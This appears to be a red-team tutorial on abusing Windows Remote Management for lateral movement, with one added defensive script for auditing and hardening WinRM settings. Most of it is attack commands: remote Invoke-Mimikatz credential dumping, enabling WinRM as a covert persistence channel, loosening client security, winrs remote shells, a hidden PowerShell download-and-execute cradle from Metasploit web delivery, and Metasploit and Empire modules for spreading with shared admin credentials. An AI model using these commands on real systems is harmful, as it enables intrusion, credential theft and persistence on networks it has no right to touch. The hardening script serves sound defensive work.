WinRM (Windows Remote Management) is Microsoft's implementation of the WS-Management protocol: a service that allows administrators to perform management tasks on systems remotely. Communication is SOAP over HTTP (TCP 5985) or HTTPS (TCP 5986). Kerberos and NTLM (Negotiate) authentication are supported by default, and Basic authentication can additionally be enabled. By default only members of the local Administrators group (and, from Windows 8 / Server 2012 onwards, the Remote Management Users group) are allowed to connect, so using the service normally requires administrator-level credentials.

In a red team scenario, once local administrator access has been achieved on one host, the same credentials can be used for lateral movement inside the network if WinRM is used for management of the servers and the local administrator password is shared between systems.


Hosts listening on TCP 5985 (HTTP) or 5986 (HTTPS) have a WinRM listener running. A simple Nmap service scan can be used to find them (TARGET_RANGE is the network range to be scanned):

nmap -p 5985,5986 -sV TARGET_RANGE

WinRM – Port Discovery

If port 5985 is open but port 5986 is closed, the WinRM service is configured to accept connections over HTTP only and there is no transport-level (TLS) encryption. Note that this does not mean the traffic is plaintext: with Kerberos or NTLM authentication the SOAP payload is still encrypted at the message level, unless AllowUnencrypted has been set on both sides or Basic authentication is used, in which case credentials and commands cross the wire in the clear.

WinRM – Ports

From a system on which local administrator access has already been obtained, and whose local administrator credentials are also valid on the target, the PowerShell Invoke-Command cmdlet can be used for command execution over WinRM (PowerShell remoting):

Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }

WinRM – Command Execution

Mimikatz can also be executed remotely to retrieve credentials from memory without dropping any binary to disk: the Invoke-Mimikatz script (PowerSploit) is imported locally and, when given -ComputerName, injects and runs Mimikatz in memory on the target over a PowerShell remoting session. Note that this script is widely signatured, so expect it to be blocked by antivirus or AMSI on well-maintained hosts.

Import-Module ./Invoke-Mimikatz.ps1
Invoke-Mimikatz -ComputerName TARGET

WinRM – Mimikatz

The recovered credentials can then be used to access other systems, which can possibly lead to domain escalation.

For systems that do not have WinRM enabled, the service can be enabled and configured as a persistence mechanism, since it is a legitimate Windows service that rarely attracts attention. The following command, run from an elevated PowerShell prompt, enables PowerShell remoting: it starts the WinRM service, sets it to start automatically, creates an HTTP listener and adds the corresponding firewall exception.

Enable-PSRemoting -Force

WinRM – Enable the Service

By default it may not be possible to connect to another system over WinRM from the compromised host, and additional client-side configuration may be needed. The following commands configure the service and allow the client to connect over HTTP to any host: winrm quickconfig starts the service and creates an HTTP listener; AllowUnencrypted lets the client negotiate sessions without message-level encryption (the target must have the same setting under winrm/config/Service to accept them); and TrustedHosts set to * lets the client authenticate with NTLM to any host, including non-domain machines and targets addressed by IP, which WinRM otherwise refuses when Kerberos cannot be used. The winrm commands are written for cmd.exe; in PowerShell the @{...} argument has to be quoted.

winrm quickconfig
winrm set winrm/config/Client @{AllowUnencrypted="true"}
Set-Item WSMan:\localhost\Client\TrustedHosts -Value *
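To see what the commands above actually change on a host, and what the hardened values look like, here is an added example (not code from the original post) that reads the relevant entries from the WSMan: drive, flags the attacker-friendly values, and includes a function that reverses them. It must run from an elevated PowerShell prompt on the host being inspected, and the WSMan: drive only exists while the WinRM service is running; the list of settings checked is my own selection.

```powershell
# Added example, not from the original post. Inspects the WinRM settings that
# winrm quickconfig / AllowUnencrypted / TrustedHosts change and flags weak values.
function Get-WinRMPosture {
    # Path in the WSMan: drive, the value an attacker wants, and the hardened value
    $checks = @(
        @{ Path = 'WSMan:\localhost\Service\AllowUnencrypted'; Weak = 'true';  Hardened = 'false' }
        @{ Path = 'WSMan:\localhost\Client\AllowUnencrypted';  Weak = 'true';  Hardened = 'false' }
        @{ Path = 'WSMan:\localhost\Client\TrustedHosts';      Weak = '*';     Hardened = '' }
        @{ Path = 'WSMan:\localhost\Service\Auth\Basic';       Weak = 'true';  Hardened = 'false' }
        @{ Path = 'WSMan:\localhost\Service\Auth\Kerberos';    Weak = 'false'; Hardened = 'true' }
    )
    foreach ($c in $checks) {
        $current = (Get-Item $c.Path -ErrorAction SilentlyContinue).Value
        if     ("$current" -eq $c.Weak)     { $finding = 'WEAK' }
        elseif ("$current" -eq $c.Hardened) { $finding = 'ok' }
        else                                { $finding = 'review' }
        [pscustomobject]@{
            Setting  = $c.Path -replace '^WSMan:\\localhost\\', ''
            Current  = $current
            Hardened = $c.Hardened
            Finding  = $finding
        }
    }
    # Listeners: an HTTP listener on 5985 means no transport encryption, so Basic
    # authentication or AllowUnencrypted sessions would cross the wire in the clear.
    # An HTTPS listener on 5986 needs a server certificate but also removes the
    # need for TrustedHosts entries when NTLM has to be used.
    foreach ($l in Get-ChildItem WSMan:\localhost\Listener) {
        $props     = Get-ChildItem $l.PSPath
        $transport = ($props | Where-Object Name -eq 'Transport').Value
        $port      = ($props | Where-Object Name -eq 'Port').Value
        if ($transport -eq 'HTTPS') { $finding = 'ok' } else { $finding = 'review' }
        [pscustomobject]@{
            Setting  = "Listener $($l.Name)"
            Current  = "$transport $port"
            Hardened = 'HTTPS 5986'
            Finding  = $finding
        }
    }
}

function Set-WinRMHardened {
    # Reverses the client/service changes shown above; elevated prompt required.
    Set-Item   WSMan:\localhost\Service\AllowUnencrypted -Value $false
    Set-Item   WSMan:\localhost\Client\AllowUnencrypted  -Value $false
    Set-Item   WSMan:\localhost\Service\Auth\Basic       -Value $false
    Clear-Item WSMan:\localhost\Client\TrustedHosts -Force
}

Get-WinRMPosture | Format-Table -AutoSize
# Set-WinRMHardened   # run on a host you administer to apply the hardened values
```

On a host where the three commands from the post have been run, the report shows Client\AllowUnencrypted and Client\TrustedHosts as WEAK and the quickconfig listener as HTTP 5985; the same report run after Enable-PSRemoting alone shows only the HTTP listener for review, since PowerShell remoting does not touch AllowUnencrypted or TrustedHosts.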

Dave Hardy has written a great post, PowerShell PSRemoting Pwnage, which contains additional commands. Alternatively, WinRM can be configured through the Local Group Policy editor (Computer Configuration > Administrative Templates > Windows Components > Windows Remote Management).

WinRM – Local Group Policy


Windows Remote Shell (winrs) is a command-line client that ships with Windows Vista / Server 2008 and later. If WinRM is enabled on the target, winrs can be used to execute commands on it remotely. Passing cmd as the command opens an interactive command prompt on the remote host:

winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"


Instead of an interactive shell, individual commands can be run for quiet reconnaissance of the target, for example listing the members of the local Administrators group:

winrs -r:http://WIN-2NE38K15TGH/wsman "net localgroup administrators"

WinRS – Command Execution

It is also possible to upgrade Windows Remote Shell access to a Meterpreter session via Metasploit's web delivery module (exploit/multi/script/web_delivery). With the PSH target and a listener payload selected, the module hosts the payload on the attacker's machine and prints the PowerShell one-liner that needs to be executed on the target.

use multi/script/web_delivery

WinRS – Metasploit Web Delivery

Executing that PowerShell command through the existing WinRS session downloads and runs the staged code. The one-liner disables TLS certificate validation (ServerCertificateValidationCallback={$true}), routes the download through the system proxy with the current user's default credentials, and passes the downloaded script to IEX; the URL of the hosted script is filled in by the module.

powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $h.downloadstring('');

WinRS – Execute PowerShell Command

A Meterpreter session opens, which provides more flexibility for post-exploitation activities.

WinRS – Metasploit Meterpreter

Active sessions are listed with the sessions command, and sessions -i followed by the session number interacts with the new one.

WinRS – Meterpreter Session


Metasploit Framework has several modules for discovering hosts with the WinRM service enabled, finding valid credentials for the service, and executing arbitrary commands and code over it. The auxiliary/scanner/winrm/winrm_auth_methods module discovers systems with WinRM enabled and the authentication protocols they support.

Metasploit – WinRM Auth Methods

If local administrator credentials have been obtained, they can be tried against other hosts via the WinRM service. The auxiliary/scanner/winrm/winrm_login module determines on which systems the credentials are valid.

Metasploit – WinRM Discovery of Credentials

Metasploit also has a module, auxiliary/scanner/winrm/winrm_cmd, which executes an arbitrary command over the WinRM service. It requires local administrator credentials (USERNAME and PASSWORD), the DOMAIN (the workstation or host name for a local account), the target host and the command to run (CMD).

Metasploit – WinRM Command Execution

The output of the command is returned to the console:

Metasploit – WinRM Command Output

Arbitrary code execution over WinRM is also possible with the exploit/windows/winrm/winrm_script_exec module. It requires local administrator credentials and the list of hosts on which the code will be executed, and can be used for lateral movement into hosts that share the same local administrator account.

Metasploit – WinRM Code Execution Module Configuration

Upon exploitation the module first attempts to change the PowerShell execution policy so that unsigned scripts can run. A PowerShell script is then written to disk and executed automatically to return a Meterpreter session. The module also attempts to migrate into a SYSTEM-level process so that the shell is not lost when the WinRS shell is terminated by its idle time limit.

Metasploit – WinRM Code Execution


For engagements that use Empire there is a PowerShell module which executes code remotely over WinRM in order to expand access inside the network. The module requires local administrator credentials (UserName and Password), a Listener, the Agent to run from and the target host (ComputerName).

usemodule lateral_movement/invoke_psremoting

Empire – PSRemoting

The list of active agents can be retrieved with the agents command, and interact followed by the agent name (interact X5DACN91) switches to the new agent.

Empire – List of Agents

Post-exploitation commands can then be executed on the host that was compromised through the WinRM service.

Empire – Command Execution via WinRM